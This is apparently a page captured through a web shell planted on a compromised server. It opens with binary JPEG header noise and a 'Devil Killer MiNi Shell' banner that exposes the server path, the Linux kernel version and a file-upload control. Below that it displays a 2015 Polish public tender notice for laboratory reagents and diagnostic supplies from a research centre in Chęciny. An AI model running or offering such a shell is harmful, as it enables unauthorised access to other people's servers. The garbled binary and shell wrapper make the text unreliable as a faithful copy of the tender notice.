JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151203/329384-N-2015.html

<p class="kh_header"><b>Chęciny: Dostawa odczynników diagnostycznych, testów immunoenzymatycznych, podłoży mikrobiologicznych i materiałów zużywalnych.</b><br>
<b>Numer ogłoszenia: 329384 - 2015; data zamieszczenia: 03.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Naukowo-Technologiczne , Podzamcze 45, 26-060 Chęciny, woj. świętokrzyskie, tel. 41 343 40 50, faks 41 307 44 76.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcnt.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://bip.sejmik.kielce.pl/387-zamowienia-publiczne.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników diagnostycznych, testów immunoenzymatycznych, podłoży mikrobiologicznych i materiałów zużywalnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników diagnostycznych, testów immunoenzymatycznych, podłoży mikrobiologicznych i materiałów zużywalnych.
Zamawiający podzielił przedmiot zamówienia na osiem zadań:
Zadanie I. Dostawa odczynników dedykowanych do analizatora biochemicznego ACCENT-200.
Zadanie II. Dostawa odczynników dedykowanych do aparatu BD Bactec FX, BD Phoenix 100 oraz cytometru BD FACS Calibur.
Zadanie III. Dostawa testów diagnostycznych oraz odczynników dedykowanych do analizatora IMMULITE 2000 XPi.
Zadanie IV. Dostawa zestawów do wirowania osocza bogatopłytkowego
Zadanie V. Dostawa testów immunoenzymatycznych.
Zadanie VI. Dostawa podłoży mikrobiologicznych.
Zadanie VII. Dostawa pasków do oznaczania MIC.
Zadanie VIII. Dostawa materiałów zużywalnych.
Szczegółowy opis przedmiotu zamówienia dla każdego zadania znajduje się w załączniku nr 9 do SIWZ.
Wymagania Zamawiającego dot. przedmiotu zamówienia:
- przedmiot zamówienia musi być fabrycznie nowy, pełnowartościowy, wolny od wszelkich wad i uszkodzeń, bez wcześniejszej eksploatacji. 
- do dostarczanych odczynników/materiałów Wykonawca winien załączyć karty charakterystyk, stosowne świadectwa/certyfikaty jakości potwierdzające spełnienie stawianych w SIWZ wymagań, lub inne ewentualne wymagane prawem certyfikaty i świadectwa potwierdzające dopuszczenie dostarczonego produktu do obrotu na terytorium Polski. 
- wszystkie dokumenty załączone do dostarczonego przedmiotu zamówienia muszą być sporządzone w języku polskim w formie drukowanej lub tłumaczone na język polski za wyjątkiem certyfikatów kontroli jakości do danej partii produkcyjnej przy dostawie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.12.41.30-5, 33.69.81.00-0, 38.43.71.10-1, 33.19.25.00-7, 33.69.66.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia warunek udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą Oświadczenia o spełnianiu warunków, zgodnie z załącznikiem nr 2 do SIWZ. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale V i VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Zamawiający wymaga wykazania się przez Wykonawcę wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 dostawy o charakterze odpowiadającym przedmiotowi niniejszego zamówienia, każda o wartości zamówienia brutto nie mniejsza niż:
Zadanie I - 8 000 zł
Zadanie II - 25 000 zł
Zadanie III - 16 000 zł 
Zadanie IV - 6 000 zł
Zadanie V -  5 000 zł
Zadanie VI - 500 zł
Zadanie VII -  7 000 zł
Zadanie VIII - 6 000 zł
Wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego dostawa została wykonana, oraz załączeniem dowodu, czy została wykonana lub jest wykonywana należycie - załącznik nr 5  do  SIWZ. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale V i VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia warunek udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą Oświadczenia o spełnianiu warunków, zgodnie z załącznikiem nr 2 do SIWZ. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale V i VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia warunek udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą Oświadczenia o spełnianiu warunków, zgodnie z załącznikiem nr 2 do SIWZ. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale V i VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Zamawiający wymaga przedłożenia przez Wykonawcę polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę gwarancyjną minimum:
- Zadanie II - 25 000 zł
W przypadku pozostałych Wykonawców Zamawiający uzna warunek za spełniony na podstawie złożonego wraz z ofertą Oświadczenia o spełnianiu warunków zgodnie z załącznikiem nr 2 do SIWZ. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale V i VI SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz ofertowy - załącznik nr 1 do SIWZ. 
2) Zobowiązanie podmiotu/podmiotów oddających do dyspozycji wykonawcy niezbędne zasoby sporządzonego zgodnie z załącznikiem nr 6 do SIWZ (jeżeli dotyczy).
3) Zaakceptowany przez Wykonawcę projekt umowy - załącznik nr 8 do SIWZ.
4) Wymagane aktualne świadectwa, atesty i certyfikaty dla oferowanego asortymentu.
4.1. W celu potwierdzenia bezpieczeństwa jakości oferowanych wyrobów, Wykonawca zobowiązany  jest załączyć do oferty niezbędne świadectwa, atesty, certyfikaty wymagane przepisami prawa wystawione przez uprawnione jednostki. 
4.2. Oferowany przedmiot zamówienia musi posiadać znak CE (załączyć kopię) - jeżeli 
dotyczy. 
4.3. Oświadczenie Wykonawcy potwierdzające dopuszczenie przedmiotu zamówienia 
do stosowania na terenie Polski (zgodnie z przepisami ustawy z dnia 20 maja 2010 r. 
o wyrobach medycznych) - wzór Oświadczenia stanowi Załącznik nr 7- jeżeli     
dotyczy.
4.4. Dla wyrobów medycznych do oferty należy dołączyć (jeżeli dotyczy):
4.4.1. Kopię Deklaracji Zgodności / lub kopię Certyfikatu CE.
4.5. Karta substancji niebezpiecznych - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian w zawartej umowie w sprawie niniejszego zamówienia publicznego, określając jednocześnie warunki ich wprowadzenia:
a) Ustawowa zmiana wysokości podatku VAT.
b) Zmiana terminu wykonania umowy (klęska żywiołowa, siła wyższa itp.)
c)Wystąpienie konieczności ograniczenia zakresu rzeczowego przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.sejmik.kielce.pl/387-zamowienia-publiczne.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Naukowo - Technologiczne, Podzamcze 45, 26-060 Chęciny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2015 godzina 10:00, miejsce: Regionalne Centrum Naukowo - Technologiczne, Podzamcze 45, 26-060 Chęciny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie dopuszcza możliwości składania ofert wariantowych. W przypadku, gdy oferta zawierać będzie propozycje rozwiązań alternatywnych lub wariantowych - oferta zostanie odrzucona.
2. Zamawiający nie zamierza zawrzeć umowy ramowej jak i ustanowienia dynamicznego systemu zakupów.
3. Zamawiający nie zamierza dokonać wyboru najkorzystniejszej oferty z  zastosowaniem aukcji elektronicznej.
4. Zamawiający  dopuszcza możliwości składania ofert częściowych.
5. Zamawiający nie dopuszcza możliwości dokonania przedpłaty. 
6. Zamawiający nie dopuszcza możliwości składania ofert równoważnych.
7. Koszty opracowania i dostarczenia oferty oraz uczestnictwa w przetargu obciążają wyłącznie   Wykonawcę.
8. Rozliczenia dokonywane będą tylko w złotych polskich.
9. Zamawiający udostępnia SIWZ na stronie internetowej http://bip.sejmik.kielce.pl/387-zamowienia-publiczne.html od dnia zamieszczenia publikacji w Biuletynie Zamówień Publicznych.
10. SIWZ w formie papierowej na wniosek Wykonawcy przekazuje się odpłatnie (50 groszy za stronę + koszty przesyłki - listem poleconym za zwrotnym potwierdzeniem odbioru) - art. 42 ust 2 ustawy.
11. Zamawiający w szczególnie uzasadnionych przypadkach może w każdym  czasie, przed upływem  terminu do składania ofert, zmienić treść SIWZ. Dokonaną  zmianę  Zamawiający przekazuje niezwłocznie wszystkim Wykonawcom, którym  przekazano SIWZ oraz zamieści na stronie internetowej Zamawiającego.
12. Jeżeli zmiana treści SIWZ prowadzi do zmiany treści ogłoszenia o zamówieniu,  Zamawiający  zamieszcza ogłoszenie o zmianie  ogłoszenia w Biuletynie Zamówień Publicznych.
13. Jeżeli w wyniku zmiany treści SIWZ nieprowadzącej do zmiany treści ogłoszenia   o zamówieniu jest niezbędny dodatkowy czas na wprowadzenie zmian  w ofertach,  Zamawiający przedłuży termin składania ofert. 
14. O przedłużeniu terminu składania  ofert Zamawiający niezwłocznie zamieści informację na stronie internetowej  Zamawiającego - art. 38 ust. 6 ustawy.
15. Zgodnie z zapisem art. 8 ustawy Pzp oraz regulacją ustawy o dostępie do informacji publicznej  postępowanie o udzielenie zamówienia publicznego jest jawne. Zamawiający może ograniczyć  dostęp do informacji związanych z postępowaniem tylko w przypadkach określonych  w ustawie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa odczynników dedykowanych do analizatora biochemicznego ACCENT-200..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw Accent-200 CHOL niezbędny do oznaczenia stężenia cholesterolu całkowitego lub równoważny dedykowany do analizatora biochemicznego Accent-200, 	Op./500 oznaczeń	2 szt
2.	Zestaw Accent-200 HDL Direct niezbędny do oznaczenia stężenia cholesterolu HDL lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op./240 oznaczeń	3 szt
3.	Zestaw Accent-200 TG niezbędny do oznaczenia stężenia trójglicerydów lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op./540 oznaczeń	2 szt
4.	Zestaw Accent-200 ALBUMIN niezbędny do oznaczenia stężenia albumin lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op./100 oznaczeń	8 szt
5.	Zestaw Accent-200 CALCIUM niezbędny do oznaczenia stężenia jonów wapnia lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op./130 oznaczeń	6 szt
6.	Zestaw Accent-200 MG niezbędny do oznaczenia stężenia jonów magnezu lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op./80 oznaczeń	10 szt
7.	Zestaw Accent-200 PHOSPHORUS niezbędny do oznaczenia stężenia jonów fosforanowych lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op./90 oznaczeń	9 szt
8.	Zestaw Accent-200 FERRUM niezbędny do oznaczenia stężenia jonów żelaza lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op./320 oznaczeń	3 szt
9.	Zestaw Accent-200 CRP Ultra niezbędny do wysokoczułego oznaczenia stężenia białka C-reaktywnego lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op./120 oznaczeń	7 szt
10.	Materiał kontrolny, surowica kontrolna do diagnostyki białek specyficznych lub równoważna dedykowana do analizatora biochemicznego Accent-200	Op.	1
11.	Kalibrator CRP Ultra lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op.	1 szt
12.	Materiał kontrolny, surowica kontrolna SERUM HN lub równoważna dedykowana do analizatora biochemicznego Accent-200	Op.	3 szt
13.	Materiał kontrolny, surowica kontrolna SERUM HP lub równoważna dedykowana do analizatora biochemicznego Accent-200	Op.	3 szt
15.	Kalibrator HDL/LDL lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op.	3 szt
16.	Kalibrator, Multicalibrator Level 1 lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op.	3 szt
17.	Kalibrator, Multicalibrator Level 2 lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op.	3 szt
18.	Roztwór czyszczący, Accent-200 Acid Washing Solution lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op.	2 szt
19.	Roztwór czyszczący, Accent-200 Alkaline Washing Solution lub równoważny dedykowany do analizatora biochemicznego Accent-200	Op.	2 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.12.41.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa odczynników dedykowanych do aparatu BD Bactec FX, BD Phoenix 100 oraz cytometru BD FACS Calibur..</p>
